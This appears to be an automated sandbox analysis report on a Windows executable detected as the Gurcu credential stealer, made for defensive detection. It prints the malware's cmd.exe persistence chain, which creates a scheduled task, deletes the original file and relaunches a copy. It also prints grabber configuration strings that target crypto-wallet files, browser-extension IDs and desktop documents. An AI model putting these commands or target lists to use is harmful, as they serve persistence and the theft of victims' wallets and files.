Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696584680t
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680
Source: tDLozbx48F.exe, 00000001.00000002.1261425089.0000022E48792000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <article class="elementor-post elementor-grid-item post-15135 post type-post status-publish format-standard has-post-thumbnail hentry category-malware tag-anydesk tag-armory tag-binance tag-bitcoin tag-bluestacks tag-brave-browser tag-bytecoin tag-chrome tag-crypto-wallets tag-cryptocurrency tag-data-breach tag-discord tag-edge tag-firefox tag-google-ads tag-malware tag-monero tag-notepad tag-openvpn tag-opera-software tag-outlook tag-pale-moon tag-phishing tag-remote-access-trojan tag-rhadamanthys-stealer tag-stealer tag-telegram tag-virtualbox tag-vmware tag-zcash tag-zoom ast-archive-post">
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696584680}
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696584680h
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696584680o
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696584680f
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2439524113.000001F5FE760000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==O;
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696584680j
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696584680d

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"	Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tdlozbx48f" /sc minute /tr "c:\users\user\appdata\local\esetsecurity\tdlozbx48f.exe" /rl limited /f && del /f /s /q /a "c:\users\user\downloads\ojbxnksgmz\tdlozbx48f.exe" &&start "" "c:\users\user\appdata\local\esetsecurity\tdlozbx48f.exe"
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tdlozbx48f" /sc minute /tr "c:\users\user\appdata\local\esetsecurity\tdlozbx48f.exe" /rl limited /f && del /f /s /q /a "c:\users\user\downloads\ojbxnksgmz\tdlozbx48f.exe" &&start "" "c:\users\user\appdata\local\esetsecurity\tdlozbx48f.exe"			Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Queries volume information: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Queries volume information: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Queries volume information: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580486000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58045A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580457000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58058A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58052B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58038E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580364000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5296B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5291F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580593000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5298B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A75B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5298E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5294E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A7D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580537000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58048C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A802000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A75E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580596000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58053A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58045D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5296E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A7D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580437000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58052E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: TC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>.txt;.doc;.xls;.kbd;.pdf</string><string>Grabber\Desktop Files</string></a0
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: TC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>.txt;.doc;.xls;.kbd;.pdf</string><string>Grabber\Desktop Files</string></a0
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: TC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command 